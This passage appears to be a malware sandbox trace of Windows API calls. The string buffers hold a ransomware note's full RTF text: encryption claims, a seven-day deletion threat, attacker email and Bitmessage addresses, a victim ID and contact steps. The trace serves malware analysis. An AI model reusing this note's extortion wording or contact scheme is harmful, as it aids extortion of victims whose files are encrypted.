g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0293.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0293.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\niYS»\x07³\x98'\x9eQ_Ú$\x9e5ã­:f£1}m\x03\x1d", lpUsedDefaultChar=0x0) returned 8717 [0293.369] WriteFile (in: hFile=0x2d4, lpBuffer=0x1ef8bd8*, 